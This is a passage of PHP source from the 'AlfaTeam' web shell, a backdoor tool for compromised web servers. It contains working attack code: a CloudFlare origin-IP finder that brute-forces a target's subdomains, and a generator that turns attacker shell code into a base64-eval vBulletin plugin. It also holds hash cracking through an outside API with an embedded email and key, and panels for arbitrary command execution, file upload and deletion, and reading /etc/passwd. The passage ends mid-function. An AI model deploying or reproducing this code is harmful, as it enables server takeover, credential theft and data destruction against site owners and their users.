    @__write_file('alfa_ssi.shtml', __get_resource($code));
    @chmod("alfa_ssi.shtml", 0755);
    echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
    echo "</div>";
    alfafooter();
}
function alfacloudflare()
{
    alfahead();
    AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
    echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>\n<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
    if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
        $url = $_POST['alfa1'];
        if (!preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url)) {
            $url = preg_replace('/^(https?):\\/\\//', '', $url);
            $url = "http://www." . $url;
        }
        $headers = @get_headers($url, 1);
        $server = $headers['Server'];
        $subs = array('owa.', '2tty.', 'm.', 'gw.', 'mx1.', 'store.', '1', '2', 'vb.', 'news.', 'download.', 'video', 'cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.', 'search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.', 'books.', 'answers.', 'service.', 'groups.', 'images.', 'upload.', 'up.', 'tube.', 'users.', 'admin.', 'administrator.', 'private.', 'design.', 'whmcs.', 'wp.', 'wordpress.', 'joomla.', 'vbulletin.', 'test.', 'developer.', 'panel.', 'contact.');
        if (preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url, $matches)) {
            if ($matches[2] != 'www') {
                $url = preg_replace('/^(https?):\\/\\//', '', $url);
            } else {
                $url = explode($matches[0], $url);
                $url = $url[1];
            }
        }
        if (is_array($server)) {
            $server = $server[0];
        }
        echo __pre();
        if (preg_match('/cloudflare/i', $server)) {
            echo "\n[+] CloudFlare detected: {$server}\n<br>";
        } else {
            echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
        }
        echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
        echo "[+] Searching for more IP addresses.\n\n<br><br>";
        for ($x = 0; $x < count($subs); $x++) {
            $site = $subs[$x] . $url;
            $ip = is_ipv4(gethostbyname($site));
            if ($ip == '(Null)') {
                continue;
            }
            echo "Trying {$site}: {$ip}\n<br>";
        }
        echo "\n[+] Finished.\n<br>";
    }
    echo "</div>";
    alfafooter();
}
function is_ipv4($ip)
{
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s)
{
    echo '<center>' . __pre() . $s . '</center>';
}
function create_table($data)
{
    echo "<table border=\"1\">";
    foreach ($data as $key => $val) {
        $array = array();
        foreach ($val as $k => $v) {
            $array[$k] = $v;
        }
        echo "<tr><td><div class='tbltxt'>" . $array['tdName'] . "</div></td><td><input type='text' id='" . $array['id'] . "' name='" . $array['inputName'] . "' " . ($array['placeholder'] ? 'placeholder' : 'value') . "='" . $array['inputValue'] . "' size='" . $array['inputSize'] . "' " . ($array['disabled'] ? 'disabled' : '') . "></td></tr>";
    }
    echo "</table>";
}
function alfaphp2xml()
{
    alfahead();
    AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
    echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>\n<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>\n<input type='submit' name='go' value=' ' /></p></form></center>";
    if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
        echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>";
        echo '<?php xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\'' . __ZW5jb2Rlcg($_POST['alfa1']) . '\'));exit;}]]></phpcode></plugin></plugins>';
        echo "</textarea></center></p>";
    }
    echo "</center></div>";
    alfafooter();
}
function alfacpcrack()
{
    alfahead();
    echo "<div class=header><center><p><div class=\"txtfont_header\">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick=\"g('cpcrack',null,'dec')\">| DeCrypter | </a><a href=javascript:void(0) onclick=\"g('cpcrack',null,'analyzer')\">| Hash Analyzer | </a></h3></center>";
    if ($_POST['alfa1'] == 'dec') {
        $algorithms = array('md5' => 'MD5', 'md4' => 'MD4', 'sha1' => 'SHA1', 'sha256' => 'SHA256', 'sha384' => 'SHA384', 'sha512' => 'SHA512', 'ntlm' => 'NTLM');
        echo "<center><div class=\"txtfont_header\">| DeCrypter |</div><br><br>\n<form onsubmit=\"g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;\"><div class=\"txtfont\">Decrypt Method:</div> <select name=\"alg\" style=\"width:100px;\">";
        foreach ($algorithms as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select><input type=\"text\" placeholder=\"Hash\" name=\"md5\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
        if ($_POST['alfa3'] == '>>') {
            $hash = $_POST['alfa2'];
            if (!empty($hash)) {
                $hash_type = $_POST['alfa4'];
                $email = "solevisible@gmail.com";
                $code = "7b9fa79f92c3cd96";
                $target = "http://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code;
                $resp = @file_get_contents($target);
                if ($resp == '') {
                    $get = new AlfaCURL();
                    $resp = $get->Send($target);
                }
                echo __pre() . '<center>';
                switch ($resp) {
                    case 'CODE ERREUR : 001':
                        echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
                        break;
                    case 'CODE ERREUR : 003':
                        echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
                        break;
                    case 'CODE ERREUR : 004':
                        echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
                        break;
                    case 'CODE ERREUR : 005':
                        echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
                        break;
                }
                if (substr($resp, 0, 4) != 'CODE' && $resp != '') {
                    echo "<b>Result: <font color='green'>" . $resp . "</font></b>";
                } elseif (substr($resp, 0, 4) != 'CODE') {
                    echo "<font color='red'>NoT Found</font><br />";
                }
                echo "</center>";
            }
        }
    }
    if ($_POST['alfa1'] == 'analyzer') {
        echo "<center><p><div class=\"txtfont_header\">| Hash Analyzer |</div></p>\n<form onsubmit=\"g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;\">\n<div class=\"txtfont\">Hash: </div> <input type=\"text\" placeholder=\"Hash\" name=\"hash\" size=\"60\" id=\"text\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center><br>";
        if ($_POST['alfa3'] == '>>') {
            $hash = $_POST['alfa2'];
            if (!empty($hash)) {
                $curl = new AlfaCURL();
                $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search");
                echo __pre() . '<center>';
                if (preg_match('#<fieldset class="trouve">(.*?)</fieldset>#', $resp, $s)) {
                    echo '<font color="green">' . $s[1] . '</font>';
                } else {
                    echo "<font color=\"red\">Not Found...!</font>";
                }
                echo "</center><br>";
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfafooter()
{
    if (!isset($_POST['ajax'])) {
        echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >\n<tr>\n<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>\n<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>\n<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>\n<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>\n</tr>\n<tr>\n<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS['cwd']) . "'> <input type='submit' value=' '></form></td>\n<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>\n</tr>\n<tr>\n<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>\n</tr>\n<tr>\n<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>\n<input type='hidden' name='a' value='FilesMAn'>\n<input type='hidden' name='c' value='" . $GLOBALS['cwd'] . "'>\n<input type='hidden' name='alfa1' value='uploadFile'>\n<input type='hidden' name='charset' value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date('Y') . " ]</span></td>\n</tr>\n</table>\n</div>\n<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>\n<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>\n<div id='update-content'></div>\n<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>\n<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>\n<script>\n\t\$('search-input').addEventListener('keydown', function(e){\n\t\tsetTimeout(function(){\n\t\t\tvar string = \$('search-input').value\n\t\t\td.getElementsByClassName('history-list')[0].innerHTML = '';\n\t\t\tfor(var i in editor_files){\n\t\t\t\tif(editor_files[i].file.search(string) != -1 || string == ''){\n\t\t\t\t\tvar mode = 0;\n\t\t\t\t\tif(i == editor_current_file){\n\t\t\t\t\t\tmode = ' is_active';\n\t\t\t\t\t}\n\t\t\t\t\tinsertToHistory(i, editor_files[i].file, mode, editor_files[i].type);\n\t\t\t\t}\n\t\t\t}\n\t\t}, 100);\n\t},false);\n\t_Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){\n\t\td.body.insertAdjacentHTML('beforeend', res);\n\t});\n\tif(" . $GLOBALS["need_to_update_header"] . "){\n\t\t_Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){\n\t\t\ttry{\n\t\t\t\tvar data = JSON.parse(res);\n\t\t\t\tconsole.log(data);\n\t\t\t\tfor(var i in data){\n\t\t\t\t\tvar html = '';\n\t\t\t\t\tfor(var b = 0; b < data[i].length; b++){\n\t\t\t\t\t\tif(i=='useful'||i=='downloader'){\n\t\t\t\t\t\t\thtml += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\thtml += data[i][b];\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tvar elem = \$('header_'+i);\n\t\t\t\t\tif(elem){elem.innerHTML = html;}\n\t\t\t\t}\n\t\t\t\t\$('header_cgishell').innerHTML = 'ON';\n\t\t\t\t\$('header_cgishell').setAttribute('class', 'header_on');\n\t\t\t}catch(e){console.log(e)}\n\t\t});\n\t}else if(islinux){\n\t\t_Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){\n\t\t\tif(res=='ok'){\n\t\t\t\t\$('header_cgishell').innerHTML = 'ON';\n\t\t\t\t\$('header_cgishell').setAttribute('class', 'header_on');\n\t\t\t}\n\t\t});\n\t}\n</script>\n</body>\n</html>\n";
    }
}
if (!function_exists("posix_getpwuid") && strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false) {
    function posix_getpwuid($p)
    {
        return false;
    }
}
if (!function_exists("posix_getgrgid") && strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false) {
    function posix_getgrgid($p)
    {
        return false;
    }
}
function alfaWhich($p)
{
    $path = alfaEx('which ' . $p, false, false);
    if (!empty($path)) {
        return strlen($path);
    }
    return false;
}
function alfaSize($s)
{
    if ($s >= 1073741824) {
        return sprintf('%1.2f', $s / 1073741824) . ' GB';
    } elseif ($s >= 1048576) {
        return sprintf('%1.2f', $s / 1048576) . ' MB';
    } elseif ($s >= 1024) {
        return sprintf('%1.2f', $s / 1024) . ' KB';
    } else {
        return $s . ' B';
    }
}
function alfaPerms($p)
{
    if (($p & 0xc000) == 0xc000) {
        $i = 's';
    } elseif (($p & 0xa000) == 0xa000) {
        $i = 'l';
    } elseif (($p & 0x8000) == 0x8000) {
        $i = '-';
    } elseif (($p & 0x6000) == 0x6000) {
        $i = 'b';
    } elseif (($p & 0x4000) == 0x4000) {
        $i = 'd';
    } elseif (($p & 0x2000) == 0x2000) {
        $i = 'c';
    } elseif (($p & 0x1000) == 0x1000) {
        $i = 'p';
    } else {
        $i = 'u';
    }
    $i .= $p & 0x100 ? 'r' : '-';
    $i .= $p & 0x80 ? 'w' : '-';
    $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
    $i .= $p & 0x20 ? 'r' : '-';
    $i .= $p & 0x10 ? 'w' : '-';
    $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
    $i .= $p & 0x4 ? 'r' : '-';
    $i .= $p & 0x2 ? 'w' : '-';
    $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
    return $i;
}
function alfaPermsColor($f, $isbash = false)
{
    $class = "";
    $num = "";
    $human = "";
    if ($isbash) {
        $class = $f["class"];
        $num = $f["num"];
        $human = $f["human"];
    } else {
        $num = substr(sprintf('%o', @fileperms($f)), -4);
        $human = alfaPerms(@fileperms($f));
        if (!@is_readable($f)) {
            $class = "main_red_perm";
        } elseif (!@is_writable($f)) {
            $class = "main_white_perm";
        } else {
            $class = "main_green_perm";
        }
    }
    return '<span style="font-weight:unset;" class="' . $class . '">' . $num . '</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="' . $class . '">' . $human . '</span>';
}
if (!function_exists("scandir")) {
    function scandir($dir)
    {
        $dh = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
function reArrayFiles($file_post)
{
    $file_ary = array();
    $file_count = count($file_post['name']);
    $file_keys = array_keys($file_post);
    for ($i = 0; $i < $file_count; $i++) {
        foreach ($file_keys as $key) {
            $file_ary[$i][$key] = $file_post[$key][$i];
        }
    }
    return $file_ary;
}
function _alfa_can_runCommand($cgi = true, $cache = true)
{
    if (isset($_SESSION["alfa_canruncmd"]) && $cache) {
        return true;
    }
    if (strlen(alfaEx("whoami", false, $cgi)) > 0) {
        $_SESSION["alfa_canruncmd"] = true;
        return true;
    }
    return false;
}
function _alfa_symlink($target, $link)
{
    $phpsym = function_exists("symlink");
    if ($phpsym) {
        @symlink($target, $link);
    } else {
        alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'");
    }
}
function _alfa_file_exists($file, $cgi = true)
{
    if (@file_exists($file)) {
        return true;
    } else {
        if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) {
            return true;
        }
    }
    return false;
}
function _alfa_file($file, $cgi = true)
{
    $array = @file($file);
    if (!$array) {
        if (strlen(alfaEx("id", false, $cgi)) > 0) {
            $data = alfaEx('cat "' . addslashes($file) . '"', false, $cgi);
            if (strlen($data) > 0) {
                return explode("\n", $data);
            } else {
                return false;
            }
        } else {
            return false;
        }
    } else {
        return $array;
    }
}
function _alfa_is_writable($file)
{
    $check = false;
    $check = @is_writable($file);
    if (!$check) {
        if (_alfa_can_runCommand()) {
            $check = alfaEx('[ -w "' . trim(addslashes($file)) . '" ] && echo "yes" || echo "no"');
            if ($check == "yes") {
                $check = true;
            } else {
                $check = false;
            }
        }
    }
    return $check;
}
function _alfa_is_dir($dir, $mode = "-d")
{
    $check = false;
    $check = @is_dir($dir);
    if (!$check) {
        if (_alfa_can_runCommand()) {
            $check = alfaEx('[ "' . trim($mode) . '" "' . trim(addslashes($dir)) . '" ] && echo "yes" || echo "no"');
            if ($check == "yes") {
                return true;
            } else {
                return false;
            }
        }
    }
    return $check;
}
function alfaFilesMan()
{
    alfahead();
    AlfaNum(8, 9, 10, 7, 6, 5, 4);
    echo "<div class=\"ajaxarea\"><div class=\"header\">";
    if (!empty($_COOKIE['f'])) {
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    }
    if (!empty($_POST['alfa1'])) {
        switch ($_POST['alfa1']) {
            case 'uploadFile':
                if (isset($GLOBALS['glob_chdir_false'])) {
                    $alfa_canruncmd = _alfa_can_runCommand(true, true);
                    $move_cmd_file = true;
                }
                $files = reArrayFiles($_FILES['f']);
                foreach ($files as $file) {
                    if ($move_cmd_file) {
                        alfaEx("cat '" . addslashes($file['tmp_name']) . "' > '" . addslashes($_POST["c"] . "/" . $file['name']) . "'");
                    } else {
                        @move_uploaded_file($file['tmp_name'], $file['name']);
                    }
                    echo "uped...!<Br>";
                }
                break;
            case 'mkdir':
                $new_dir_cmd = false;
                if (isset($GLOBALS['glob_chdir_false'])) {
                    if (_alfa_can_runCommand(true, true)) {
                        alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';mkdir '" . trim(addslashes($_POST['alfa2'])) . "'");
                    }
                } else {
                    if (!@mkdir(trim($_POST['alfa2']))) {
                        echo "<b><font color='red'>Can't create new dir !</b></font>";
                    }
                }
                break;
            case 'delete':
                function deleteDir($path)
                {
                    $path = substr($path, -1) == '/' ? $path : $path . '/';
                    $dh = @opendir($path);
                    while (($item = @readdir($dh)) !== false) {
                        $item = $path . $item;
                        if (basename($item) == ".." || basename($item) == ".") {
                            continue;
                        }
                        $type = @filetype($item);
                        if ($type == "dir") {
                            deleteDir($item);
                        } else {
                            @unlink($item);
                        }
                    }
                    @closedir($dh);
                    @rmdir($path);
                }
                if (is_array(@$_POST['f'])) {
                    foreach ($_POST['f'] as $f) {
                        if ($f == '..') {
                            continue;
                        }
                        $f = rawurldecode($f);
                        if (isset($GLOBALS["glob_chdir_false"])) {
                            if (_alfa_can_runCommand(true, true)) {
                                alfaEx("rm -rf '" . addslashes($_POST['c'] . '/' . $f) . "'");
                            }
                        } else {
                            alfaEx("rm -rf '" . addslashes($f) . "'", false, false);
                            if (@is_dir($f)) {
                                deleteDir($f);
                            } else {
                                @unlink($f);
                            }
                        }
                    }
                }
                if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..') {
                    deleteDir(rawurldecode(@$_POST['alfa2']));
                    alfaEx("rm -rf '" . addslashes($_POST['alfa2']) . "'", false, false);
                } else {
                    @unlink(rawurldecode(@$_POST['alfa2']));
                }
                if (isset($GLOBALS["glob_chdir_false"])) {
                    $source = rawurldecode(@$_POST['alfa2']);
                    if ($source != '..' && !empty($source)) {
                        if (_alfa_can_runCommand(true, true)) {
                            alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';rm -rf '" . addslashes($source) . "'");
                        }
                    }
                }
                break;
            case 'paste':
                if ($_SESSION['act'] == 'copy' && isset($_SESSION['f'])) {
                    function copy_paste($c, $s, $d)
                    {
                        if (@is_dir($c . $s)) {
                            @mkdir($d . $s);
                            $h = @opendir($c . $s);
                            while (($f = @readdir($h)) !== false) {
                                if ($f != "." and $f != "..") {
                                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                                }
                            }
                        } elseif (is_file($c . $s)) {
                            @copy($c . $s, $d . $s);
                        }
                    }
                    foreach ($_SESSION['f'] as $f) {
                        copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']);
                    }
                } elseif ($_SESSION['act'] == 'move' && isset($_SESSION['f'])) {
                    function move_paste($c, $s, $d)
                    {
                        if (@is_dir($c . $s)) {
                            @mkdir($d . $s);
                            $h = @opendir($c . $s);
                            while (($f = @readdir($h)) !== false) {
                                if ($f != "." and $f != "..") {
                                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                                }
                            }
                        } elseif (@is_file($c . $s)) {
                            @copy($c . $s, $d . $s);
                        }
                    }
                    foreach ($_SESSION['f'] as $f) {
                        @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f);
                    }
                } elseif ($_SESSION['act'] == 'zip' && isset($_SESSION['f'])) {
                    if (class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        $zipX = "alfa_" . rand(1, 1000) . ".zip";
                        if ($zip->open($zipX, 1)) {
                            @chdir($_SESSION['c']);
                            foreach ($_SESSION['f'] as $f) {
                                if ($f == '..') {
                                    continue;
                                }
                                if (@is_file($_SESSION['c'] . $f)) {
                                    $zip->addFile($_SESSION['c'] . $f, $f);
                                } elseif (@is_dir($_SESSION['c'] . $f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
                                    foreach ($iterator as $key => $value) {
                                        $key = str_replace('\\', '/', realpath($key));
                                        if (@is_dir($key)) {
                                            if (in_array(substr($key, strrpos($key, '/') + 1), array('.', '..'))) {
                                                continue;
                                            }
                                        } else {
                                            $zip->addFile($key, $key);
                                        }
                                    }
                                }
                            }
                            @chdir($GLOBALS['cwd']);
                            $zip->close();
                            __alert('>> ' . $zipX . ' << is created...');
                        }
                    }
                } elseif ($_SESSION['act'] == 'unzip' && isset($_SESSION['f'])) {
                    if (class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach ($_SESSION['f'] as $f) {
                            if ($zip->open($_SESSION['c'] . $f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                }
                unset($_SESSION['f']);
                break;
            default:
                if (!empty($_POST['alfa1'])) {
                    $_SESSION['act'] = @$_POST['alfa1'];
                    $_SESSION['f'] = @$_POST['f'];
                    $_SESSION['c'] = @$_POST['c'];
                }
                break;
        }
    }
    if (isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != '') {
        $dirContent = @scandir($_SESSION[__LAST_CWD__]);
    } else {
        $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
        if (preg_match("#(.*)\\/\\.\\.#", $_POST['c'], $res)) {
            $path = explode('/', $res[1]);
            array_pop($path);
            $_POST['c'] = implode('/', $path);
        }
        $_SESSION[__LAST_CWD__] = str_replace(array("..", "//"), array("", "/"), $_POST['c']);
    }
    $cmd_dir = false;
    if ($dirContent === false) {
        if (_alfa_can_runCommand(true, true)) {
            @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
            if (!isset($_SESSION["alfachdir_bash"]) || @(!file_exists("alfacgiapi/getdir.alfa"))) {
                $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
                alfaWriteTocgiapi("getdir.alfa", $bash);
            }
            if (empty($_SESSION[__LAST_CWD__])) {
                $_SESSION[__LAST_CWD__] = "/";
            }
            $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '" . addslashes($_SESSION[__LAST_CWD__]) . "'");
            $dirContent = json_decode($dirContent, true);
            if (is_array($dirContent)) {
                array_pop($dirContent);
                $cmd_dir = true;
            } else {
                $dirContent = false;
            }
            $_SESSION["alfachdir_bash"] = true;
        }
    }
    if ($dirContent == false) {
        echo "<center><br><span style=\"font-size:16px;\"><span style=\"color: red; -webkit-text-shadow: 1px 1px 13px;\"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>";
        alfaFooter();
        return;
    }
    global $sort;
    $sort = array('name', 1);
    if (!empty($_POST['alfa1'])) {
        if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['alfa1'], $match)) {
            $sort = array($match[1], (int) $match[2]);
        }
    }
    echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
    $dirs = $files = array();
    $n = count($dirContent);
    for ($i = 0; $i < $n; $i++) {
        if ($cmd_dir) {
            $filename = $dirContent[$i]["name"];
            $file_owner = $dirContent[$i]["owner"];
            $file_group = $dirContent[$i]["group"];
            $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
            $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"], "num" => $dirContent[$i]["permnum"], "human" => $dirContent[$i]["permhuman"]), true);
            $file_size = $dirContent[$i]["size"];
            $file_path = $_SESSION[__LAST_CWD__] . "/" . $dirContent[$i]["name"];
        } else {
            $filename = $dirContent[$i];
            $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS['cwd'] . $filename)) : array("name" => "????");
            $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS['cwd'] . $filename)) : array("name" => "????");
            $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($GLOBALS['cwd'] . $filename) : "????");
            $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($GLOBALS['cwd'] . $filename) : "????");
            $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
            $file_perm = alfaPermsColor($GLOBALS['cwd'] . $filename);
            $file_size = @filesize($GLOBALS['cwd'] . $filename);
            $file_path = $GLOBALS['cwd'] . $filename;
        }
        $tmp = array('name' => $filename, 'path' => $file_path, 'modify' => $file_modify, 'perms' => $file_perm, 'size' => $file_size, 'owner' => $file_owner, 'group' => $file_group);
        if (!$cmd_dir) {
            if (@is_file($file_path)) {
                $files[] = array_merge($tmp, array('type' => 'file'));
            } elseif (@is_link($file_path)) {
                $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
            } elseif (@is_dir($file_path) && $filename != ".") {
                $dirs[] = array_merge($tmp, array('type' => 'dir'));
            }
        } else {
            if ($dirContent[$i]["type"] == "file") {
                $files[] = array_merge($tmp, array('type' => 'file'));
            } else {
                if ($dirContent[$i]["name"] != ".") {
